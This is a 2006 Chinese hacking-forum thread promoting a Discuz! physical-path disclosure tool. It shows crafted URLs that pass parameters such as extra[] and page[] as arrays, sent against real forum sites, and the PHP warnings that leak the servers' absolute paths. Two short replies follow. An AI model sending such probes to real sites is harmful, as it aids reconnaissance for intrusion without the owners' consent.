黑色海岸线论坛 - Powered by Discuz! Board

标题: [論壇入侵]Discuz论坛物理路径爆破器 [打印本页]

作者: 烟圈配咖啡 时间: 2006-11-29 03:56 标题: [論壇入侵]Discuz论坛物理路径爆破器

LBSALE[100]LBSALE一共有两个版本。一个vb.net 2005写的，需要.net环境，一个是DELPHI写的。
来源：火狐技术联盟
原理及发现：Zizzy
Discovery By Zizzy
2006-8-17
受影响版本
Discuz!5.2
Discuz!5.1
Discuz!4.1
Discuz!4.0
.............
1.common.inc.php问题代码207行
.....
$navtitle = $navigation = ';';;
$extra = isset($extra) && preg_match("/^[&=;a-z0-9]+$/i", $extra) ? $extra : ';';;
$tpp = intval(empty($_DSESSION[';tpp';]) ? $topicperpage : $_DSESSION[';tpp';]);
$ppp = intval(empty($_DSESSION[';ppp';]) ? $postperpage : $_DSESSION[';ppp';]);
.......
提交：
http://www.discuz.net/post.php?action=newthread&fid=32&extra[]=page%3D1
返回
Warning: preg_match() expects parameter 2 to be string, array given in
/home/www/wwwroot/www.discuz.net/include/common.inc.php on line 209
2.依然是extra数组的问题
提交
http://bbs.cnbct.org/viewthread.php?tid=316&pid=1453&page=1&extra[]=page%3D1#pid1453
Warning: preg_match() expects parameter 2 to be string, array given in
/home/.cattia/bct/bbs.cnbct.org/include/common.inc.php on line 206
?
Warning: Cannot modify header information - headers already sent by (output started at
/home/.cattia/bct/bbs.cnbct.org/include/common.inc.php:206) in
/home/.cattia/bct/bbs.cnbct.org/include/global.func.php on line 139

3.global.func.php问题代码306行
function ispage($number) {
return !empty($number) && preg_match ("/^([0-9]+)$/", $number);
}
提交：
http://www.discuz.net/viewthread.php?tid=316&pid=1453&page[]=1&extra=page%3D1#pid1453
返回
Warning: preg_match() expects parameter 2 to be string, array given in
/home/www/wwwroot/www.discuz.net/include/global.func.php on line 306

总结
当把变量当成数组提交时，如果不存在该数组，但存在变量，后面的preg_match()正则表达式匹配不了，
这样就出现了绝对路径的泄露

作者: fcts1230 时间: 2006-11-29 12:51 标题: [論壇入侵]Discuz论坛物理路径爆破器

我试一下呵

作者: 肇庆 时间: 2006-12-8 13:35 标题: [論壇入侵]Discuz论坛物理路径爆破器

虽然楼主是版主，我也要实话实说
这个软件下载回来后不能使用，装了微软的.net也不行

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/)